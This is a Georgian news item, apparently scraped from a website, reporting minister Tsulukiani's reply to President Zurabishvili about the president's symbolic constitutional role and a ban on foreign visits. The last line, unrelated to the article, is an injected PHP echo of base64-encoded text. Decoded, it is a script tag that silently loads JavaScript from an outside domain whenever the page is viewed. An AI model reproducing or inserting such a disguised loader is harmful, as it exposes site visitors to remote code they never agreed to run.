celsiusi
ავერსი საქკაბელი
"ქართული ოცნების" ვიცე-პრემიერი და კულტურის მინისტრი პრეზიდენტს საკუთარ სტატუსსა და ფუნქციებს განუმარტავს და ამბობს, რომ სალომე ზურაბიშვილი არის სიმბოლო და მან "უნდა იცოდეს, რას ნიშნავს, იყო სიმბოლო".
 
კომენტარი წულუკიანმა ზურაბიშვილის მიერ მისთვის საზღვარგარეთ ვიზიტების აკრძალვაზე გაკეთებული განცხადების პასუხად გააკეთა. ამავე გზავნილში მინისტრი პრეზიდენტს ურჩევს, იშრომოს, რათა შეინარჩუნოს ქართველი ერის ნდობა.
 
"საქართველოს მთავრობა არის კონსტიტუციით პასუხისმგებელი საგარეო პოლიტიკაზე ჩვენს ქვეყანაში, ხოლო პრეზიდენტს ეს მრავალჯერ განმარტა ბევრმა სხვა ადამიანმაც, აქვს კონსტიტუციით სიმბოლური ფუნქცია. სიმბოლური ფუნქცია არ ნიშნავს ფუნქციის უქონლობას. სწორედ სიმბოლოები არის ხოლმე ჩვენი ერის ცხოვრებაში ხშირად გადამწყვეტი და მნიშვნელოვანი. მთავარია, რომ მოცემულმა სიმბოლომ კარგად გაიაზროს, რას ნიშნავს, იყო სიმბოლო, რა ნიშნავს, გქონდეს სიმბოლური როლი და რას ნიშნავს, იყო ხელისუფლების სამი სხვა შტოს შუაგულში, იმისათვის, რომ მოიპოვო ქართველი ერის ნდობა. ქართველი ერის ნდობის მოპოვება არ არის ადვილი, ამას სჭირდება შრომა, რა თქმა უნდა, პრეზიდენტმაც ბევრი უნდა იშრომოს, როგორც ჩვენ, რომ ჰქონდეს და შეინარჩუნოს ნდობა", - ამბობს წულუკიანი. 
 
566
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");